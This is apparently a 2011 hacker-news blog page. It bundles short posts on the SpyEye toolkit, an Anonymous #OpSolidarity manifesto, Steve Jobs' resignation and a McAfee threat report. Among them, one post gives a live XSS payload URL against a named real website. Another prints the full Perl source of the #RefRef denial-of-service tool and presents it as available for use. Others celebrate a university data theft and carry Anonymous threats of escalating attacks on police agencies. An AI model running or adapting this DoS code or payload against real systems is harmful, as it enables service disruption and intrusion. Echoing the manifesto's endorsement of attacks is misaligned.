SpyEye is Becoming A Big Threat For Cyber Security

SpyEye, a potentially dangerous hacking tool, has become widely available for anyone to buy, giving rise to concerns about the threat posed by cyber attacks.
According to an article on USA Today, security researchers have predicted a large rise in the number of attacks orchestrated using SpyEye for the rest of the year.
The toolkit, which is far more dangerous and sophisticated than ZeuS, was previously used by a group of elite hackers and was sold for as much as $10,000.
However, after a group of French security researchers managed to crack the toolkit’s activation key, its entire source code has been laid bare for hackers to replicate and sell for as low as $95, making it available for virtual anyone with malicious intent. "SpyEye is very dynamic and versatile," Amit Klein, chief technical officer of Trusteer warns.

“Every level of criminal, from the lowest to the highest rungs, can now use one of the deadliest Swiss Army knife hacking toolkits in the world,"  Sean Bodmer, senior threat intelligence analyst at network security firm Damballa, told USA Today.

Ever since the toolkit was released online, 14 cyber gangs have taken advantage of it, sending commands to thousands of botnet PCs in the United States.

-News Source (ITPro Portal)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">SpyEye is Becoming A Big Threat For Cyber Security"https://www.voiceofgreyhat.com/2011/08/spyeye-is-becoming-big-threat-for-cyber.html</a>

Anonymous Started #Op-Solidarity To Protest Against FBI, MET & Other Agencies

Well known hacker group Anonymous declared Operation Solidarity (#OpSolidarity) to protest against FBI in the US, MET and all other agencies who have arrested freedom fighting Anon's in recent months.

According To the Official Press Release Of Anonymous:-

"This is a message from Anonymous to all Anon's, FBI in the US, MET Police in the UK, and all other agencies who have arrested freedom fighting Anon's in recent months:

To Anon's: While the show of support for all arrested Anonymous and LulzSec members has been great, including all donations to said Anon's legal funds, we feel this is not enough. There is so much more that we, as a whole, can do to further pressure the FBI, MET, and other authorities into releasing, and dropping charges on our fellow freedom fighters. I am here by declaring #OpSolidarity to be in effect as of now. Brain storm with other Anon's to come up with new ways to hit MET, FBI, and other agencies; with the sole purpose of getting them to drop charges against our brothers and sisters. I know each and everyone of you, if you got v&, would want the other Anon's to do the same for you, and show our solidarity to the world. Cyber protesters have been arrested by corrupt government agencies all of the world; this is not okay. Show them, that this is not okay.

To MET, FBI, and other police agencies currently holding suspected Anonymous members in custody:
    We, Anonymous, demand the immediate release of the following people: Jake Davis aka "Topiary", Christopher Wayne Cooper aka “Anthrophobic;” Joshua John Covelli aka “Absolem” and “Toxic;” Keith Wilson Downey, Mercedes Renee Haefer, aka “No” and “MMMM;” Donald Husband, aka “Ananon;”  Vincent Charles Kershaw,  aka “Trivette,” “Triv” and “Reaper;” Ethan Miles, James C. Murphy, Drew Alan Phillips, aka “Drew010;” Jeffrey Puglisi, aka “Jeffer,” “Jefferp” and “Ji;” Daniel Sullivan, Tracy Ann Valenzuela, and Christopher Quang Vo. Along with all other persons currently being detained by authorities worldwide for being suspected members of Anonymous. Failure to comply with these demands will result in dramatically increased hostilities against authorities currently holding any members of Anonymous worldwide.

    I have been a Hacktivist since the mid 90's, and active within Anon for a few years, and i have never ONCE disclosed my name on any dumps, roots, or site defacements. I have also changed my handle every year or so for the last 10 years. I have done this because i was afraid of getting caught at some point. I disclose my name now for one reason, and one reason alone: I am not afraid anymore. You cannot arrest an idea, nor can you stop one as powerful as the one Anonymous, Anti-Sec, and LulzSec are championing. We are not afraid anymore.

"You are not failures, you have not blown away. You can get what you want, and you are worth having it. Believe in yourself." - Jake Davis aka "Topiary"

-Bree
@anon_bree

We are Anonymous
We are Legion
We do not forgive
We do not forget fallen Anonymous members
Expect Us.."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Anonymous Started #Op-Solidarity To Protest Against FBI, MET & Other Agencies"https://www.voiceofgreyhat.com/2011/08/anonymous-strated-op-solidarity-to.html</a>

Steve Jobs Resigns as Apple's CEO

A historical chapter ends.The Big Boss of Apple Sir & Mr. Steve Jobs resigns as the CEO (Chief Executive Officer) of Apple. This iconic figure has struggled with various medical conditions through his tenure in Cupertino, battling pancreatic cancer in 2004 and undergoing a liver transplant in April 2009. Jobs has been on medical leave since January 2011, a year plus after returning from the transplant, so his resignation isn't entirely unforeseen.

To the Apple Board of Directors and the Apple Community:-

"I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple’s CEO, I would be the first to let you know. Unfortunately, that day has come.
I hereby resign as CEO of Apple. I would like to serve, if the Board sees fit, as Chairman of the Board, director and Apple employee.
As far as my successor goes, I strongly recommend that we execute our succession plan and name Tim Cook as CEO of Apple.
I believe Apple’s brightest and most innovative days are ahead of it. And I look forward to watching and contributing to its success in a new role.
I have made some of the best friends of my life at Apple, and I thank you all for the many years of being able to work alongside you."

Steve

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Steve Jobs Resigns as Apple's CEO"https://www.voiceofgreyhat.com/2011/08/steve-jobs-resigns-as-apples-ceo.html</a>

XSS Vulnerability Found By Konvic Jack On windowsitpro.com

Non-persistent XSS vulnerability  found by Konvic Jack on the official website windowsitpro.com

About Windows It Pro:- 

Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.

Vulnerable Site:-
http://www.windowsitpro.com/

Vulnerable Link:-

http://www.windowsitpro.com/home/search.aspx?query=%3Cscript%3Ealert%28%22hacked%20by%20Konvic%20Jack%22%29%3C/script%3E

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">XSS Vulnerability Found By Konvic Jack On windowsitpro.com"https://www.voiceofgreyhat.com/2011/08/xss-vulnerability-found-by-konvic-jack.html</a>

Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available

Earlier I have told that LOIC will be replaced with a new tool named #RefRef. So here it it. Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available. The tool has been programed in perl, python & javascript. First it was tested on pastebin, and as expected it get success. 

Source Code Of #RefRef:-

#!usr/bin/perl
#RefRef (C) Anonymous 2011
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
 
sub adios {
print "\n[+] Stoping attack\n";
copyright();
}
 
sub head {
print "\n\n-- == #RefRef == --\n\n";
}
 
sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 \n";
}
 
sub toma {
return $nave->get($_[0]);
}
 
# ¿ The End ?

The Video Of Executing #RefRef:- 

For More information Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Long Awaited DDOS tool of Anon #RefRef Source Code is Now Available"https://www.voiceofgreyhat.com/2011/08/long-awaited-ddos-tool-of-anon-refref.html</a>

upesh.edu.pk Hacked, 3GB Of Internal Data Stolen By Ghosts

upesh.edu.pk (A university of Pakistan) Hacked by Ghosts (Black Hats). They have stolen 3GB of internal data including the Admin's passport and personal documents and much more.

For More Information Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">upesh.edu.pk Hacked, 3GB Of Internal Data Stolen By Ghosts"https://www.voiceofgreyhat.com/2011/08/upeshedupk-hacked-3gb-of-internal-data.html</a>

McAfee Threats Report: Second Quarter 2011

McAffee released its security threat report  today, announcing that 2011 has seen spikes in several different types of online security threats. “The second quarter of the year was clearly a period of chaos, changes, and new challenges,” according to the report.

The Report Contents:-

• Hacktivism

• Mobile Threats

• Cybercrime

• Malware Threats

• Adobe outpaces Microsoft in Attracting Exploits

• Messaging Threats

• Web Threats

According to McAffee:-

"The threat landscape of 2011 is undergoing a year of chaos and change. We see chaos in the major challenges that hacktivist groups such as LulzSec and Anonymous pose, and change in the shifts in new malware classes and targeted devices. This quarter McAfee Labs saw major hacktivist activity—but in a very different way. The group Lulz Security, LulzSec for short, differs from other hacktivist groups in that they had no specific goals. They were in it, as they claimed, for the “lulz” (LOLs in text messagespeak, or “laugh out loud’s” ) but
showed an agility at compromising networks and servers, and stealing usernames, passwords, and other data. LulzSec committed multiple intrusions against a wide variety of companies, as well as attacks against police departments and intelligence agencies, and many other compromises. Although many of the outcomes and uses of these compromises are still in play (and we provide a helpful overview of the quarter’s activity) one thing has become clear: Many companies, both large and small, are more vulnerable than they may have suspected. Further, the security industry may need to reconsider some
of its fundamental assumptions, including “Are we really protecting users and companies?” Although LulzSec may have ceased its operations during this quarter, the questions they and other hacktivist groups have raised will be debated for a long time.
One significant change in the first quarter of 2011 was Android’s becoming the third-most targeted platform for mobile malware. This quarter the count of new Android-specific malware moved to number one, with J2ME (Java Micro Edition), coming in second while suffering only a third as many malware. This increase in threats to such a popular platform should make us evaluate our behavior on mobile devices and the security industry’s preparedness to combat this growth.
We also saw an increase in for-profit mobile malware, including simple SMS-sending Trojans and complex Trojans that use exploits to compromise smartphones. We offer an update of cybercrime “pricebooks” as well as some changes to toolkit and service prices. “Crimeware as a service” and the burgeoning “hacktivism as a service” continue to evolve as interests and targets change. On the positive side, there were some significant victories against cybercriminals this quarter.
Continuing the change theme, we observed a considerable decrease in both AutoRun and Koobface malware, offset by a strong rise in fake-anti-virus software that targets the Mac. Apple’s OS X has been mostly ignored by malware writers for years, so this represents a significant change of target
for cybercriminals. Malware continued its overall growth during the quarter as did rootkit malware. Rootkits, used primarily for stealth and resilience, makes malware more effective and persistent; its popularity is rising. Rootkits
such as Koutodoor and TDSS appear with increasing frequency. The amount of malware that attacks vulnerabilities in Adobe products continues to overwhelm those in Microsoft products.
Botnets and messaging threats, although still at historic lows, have begun to rise again. We expected this recovery after some recent botnet takedowns. Users and enterprises must plan for this growth and prepare their defenses and responses accordingly. We again examine social engineering subjects by both
geography and subject and botnets by geography and type.
We saw several spikes in malicious web activity this quarter as well as some serious growth in blogs and wikis with malicious reputations. Sites that deliver malware, potentially unwanted programs, and phishing sites also increased.
The second quarter of the year was clearly a period of chaos, changes, and new challenges."

To Download The Full report Click Here

-News Source (McAffee)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">McAfee Threats Report: Second Quarter 2011"https://www.voiceofgreyhat.com/2011/08/mcafee-threats-report-second-quarter.html</a>